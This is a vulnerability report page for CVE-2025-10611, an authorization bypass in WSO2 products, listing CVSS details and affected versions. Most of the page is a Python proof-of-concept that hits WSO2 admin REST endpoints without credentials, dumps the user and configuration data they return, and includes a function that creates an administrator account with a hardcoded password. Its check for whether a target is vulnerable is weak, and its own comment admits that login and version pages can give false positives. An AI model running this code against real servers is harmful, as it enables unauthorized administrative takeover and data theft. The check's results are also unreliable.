Security Vulnerability Report
CVE-2025-10611 CVSS 9.8 CRITICAL

CVE-2025-10611

Published: 2025-10-16 13:15:41
Last Modified: 2025-11-21 21:38:23
Source: ed10eef1-636d-4fbe-9993-6890dfa878f8

Description

Due to an insufficient access control implementation in multiple WSO2 Products, authentication and authorization checks for certain REST APIs can be bypassed, allowing them to be invoked without proper validation. Successful exploitation of this vulnerability could lead to a malicious actor gaining administrative access and performing unauthenticated and unauthorized administrative operations.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Weakness
CWE-863 (Incorrect Authorization)

Configurations (Affected Products)

cpe:2.3:a:wso2:api_control_plane:4.5.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:wso2:api_manager:2.1.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:wso2:api_manager:2.2.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:wso2:api_manager:2.5.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:wso2:api_manager:2.6.0:*:*:*:*:*:*:* - VULNERABLE
WSO2 API Manager < 4.5.0
WSO2 Identity Server < 7.1.0
WSO2 Enterprise Integrator < 7.2.0
WSO2 Open Banking Server < 4.0.0
WSO2 Micro Integrator < 4.3.0
WSO2 Streaming Integrator < 4.0.0
Multiple versions across the WSO2 product suite (refer to the official advisory WSO2-2025-4585 for the exact affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# CVE-2025-10611 - WSO2 REST API Access Control Bypass PoC
# This PoC demonstrates how to exploit the insufficient access control
# vulnerability in WSO2 products to access protected REST APIs without authentication.

import requests
import sys
import json
from urllib3.exceptions import InsecureRequestWarning

# Disable SSL warnings (certificate verification is turned off below)
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


class WSO2Exploit:
    def __init__(self, target_url):
        self.target_url = target_url.rstrip('/')
        self.session = requests.Session()
        self.session.verify = False
        self.session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
            'Accept': 'application/json',
            'Content-Type': 'application/json'
        })

    def check_vulnerability(self):
        """Check if the target is vulnerable by accessing protected APIs without auth"""
        # Common WSO2 API endpoints that may be affected
        test_endpoints = [
            '/api/server/v1/configs',
            '/api/server/v1/users',
            '/api/server/v1/tenants',
            '/carbon/admin/login.jsp',
            '/services/Version',
            '/api/am/publisher/v1/apis',
            '/t/carbon.super/api/server/v1/users'
        ]
        print(f"[*] Checking vulnerability on: {self.target_url}")
        for endpoint in test_endpoints:
            url = f"{self.target_url}{endpoint}"
            try:
                response = self.session.get(url, timeout=10)
                # If we get 200 OK without authentication, the target is treated as vulnerable.
                # Caveat: login pages and version endpoints commonly return 200 without
                # authentication even on patched systems, so a hit there is not proof on its own.
                if response.status_code == 200:
                    print(f"[+] VULNERABLE - Endpoint accessible without auth: {endpoint}")
                    print(f"[+] Response: {response.text[:200]}")
                    return True, endpoint
                elif response.status_code == 401 or response.status_code == 403:
                    print(f"[-] Protected (expected): {endpoint} - Status: {response.status_code}")
                else:
                    print(f"[?] Unexpected response: {endpoint} - Status: {response.status_code}")
            except requests.exceptions.RequestException as e:
                print(f"[!] Error connecting to {endpoint}: {str(e)}")
        return False, None

    def exploit_admin_access(self, endpoint):
        """Attempt to gain administrative access through the vulnerable endpoint"""
        print(f"\n[*] Attempting to exploit: {endpoint}")
        # Attempt to list users
        url = f"{self.target_url}{endpoint}"
        response = self.session.get(url, timeout=10)
        if response.status_code == 200:
            print("[+] Successfully accessed protected resource!")
            try:
                data = response.json()
                print(f"[+] Retrieved data: {json.dumps(data, indent=2)[:500]}")
            except ValueError:
                # Body was not JSON; show the raw text instead
                print(f"[+] Raw response: {response.text[:500]}")
            return True
        return False

    def create_admin_user(self, tenant_path='/t/carbon.super'):
        """Attempt to create a new admin user via the vulnerable API"""
        url = f"{self.target_url}{tenant_path}/api/server/v1/users"
        payload = {
            "user": {
                "username": "poc_admin",
                "password": "P@ssw0rd!2025",
                "claims": [
                    {"uri": "http://wso2.org/claims/givenname", "value": "POC"},
                    {"uri": "http://wso2.org/claims/emailaddress", "value": "[email protected]"},
                    {"uri": "http://wso2.org/claims/lastname", "value": "Admin"}
                ],
                "profile": {
                    "roles": [{"id": "internal/admin", "name": "admin"}]
                }
            }
        }
        try:
            response = self.session.post(url, json=payload, timeout=10)
            if response.status_code in [200, 201]:
                print("[+] Admin user created successfully!")
                return True
            else:
                print(f"[-] Failed to create user. Status: {response.status_code}")
                return False
        except requests.exceptions.RequestException as e:
            print(f"[!] Error: {str(e)}")
            return False


def main():
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_url>")
        print(f"Example: {sys.argv[0]} https://wso2.example.com:9443")
        sys.exit(1)
    target = sys.argv[1]
    exploit = WSO2Exploit(target)
    is_vulnerable, endpoint = exploit.check_vulnerability()
    if is_vulnerable:
        print("\n[!] Target appears to be VULNERABLE to CVE-2025-10611")
        if endpoint:
            exploit.exploit_admin_access(endpoint)
    else:
        print("\n[-] Target does not appear to be vulnerable")


if __name__ == "__main__":
    main()
```

References

Raw JSON Data
